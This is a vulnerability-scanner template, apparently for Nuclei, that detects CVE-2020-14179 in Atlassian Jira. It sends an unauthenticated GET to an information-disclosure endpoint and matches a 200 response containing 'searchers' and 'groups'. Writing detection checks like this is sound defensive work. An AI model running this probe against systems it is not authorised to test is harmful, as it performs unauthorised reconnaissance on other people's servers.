id: CVE-2020-14179

info:
  name: Sensitive data exposure via insecure Jira endpoint
  author: x1m_martijn
  severity: medium
  description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
  reference: https://jira.atlassian.com/browse/JRASERVER-71536
  tags: cve,cve2020,atlassian,jira

requests:
  - method: GET
    path:
      - "{{BaseURL}}/secure/QueryComponent!Default.jspa"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "searchers"
          - "groups"
        condition: and

      - type: status
        status:
          - 200